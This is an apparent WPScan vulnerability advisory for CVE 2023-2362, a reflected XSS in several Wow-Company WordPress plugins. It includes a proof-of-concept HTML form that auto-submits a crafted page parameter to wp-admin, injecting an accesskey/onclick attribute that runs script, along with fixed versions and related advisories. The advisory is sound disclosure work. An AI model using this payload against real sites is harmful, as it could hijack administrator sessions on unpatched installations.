Multiple Plugins from Wow-Company – Reflected XSS | CVE 2023-2362 | Plugin Vulnerabilities

Description

The plugins do not escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open a page with the code below

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=float-menu" method="POST">
      <input type="hidden" name="page" value='"accesskey=X onclick=alert(/XSS/)//>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The XSS will be triggered when pressing ALT+SHIFT+X on Windows and CTRL+ALT+X on OS X

Affects Plugins

Fixed in 5.0.2

Fixed in 3.0.4

button-generation

Fixed in 2.3.5

calculator-builder

Fixed in 1.5.1

Fixed in 1.2.2

floating-button

Fixed in 5.3.1

mwp-herd-effect

Fixed in 5.2.2

Fixed in 2.2.2

Fixed in 4.0.2

Fixed in 3.1.1

Fixed in 4.0.2

Fixed in 2.5.6

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Verified

Yes

WPVDB ID

27e70507-fd68-4915-88cf-0b96ed55208e

Timeline

Publicly Published

2023-05-22 (about 2 years ago)

Added

2023-05-22 (about 2 years ago)

Last Updated

2023-05-22 (about 2 years ago)

Other

Published

Title

Published

2023-05-15

Title

WooCommerce Brands < 1.6.46 - Contributor+ Stored XSS

Published

2021-04-13

Title

Elementor - Header, Footer & Blocks Template < 1.5.8 - Contributor+ Stored XSS

Published

2025-01-16

Title

LocalGrid <= 1.0.1 - Reflected Cross-Site Scripting

Published

2024-10-31

Title

Display Terms Shortcode <= 1.0.4 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2023-02-02

Title

List Pages Shortcode < 1.7.6 - Contributor+ Stored XSS via Shortcode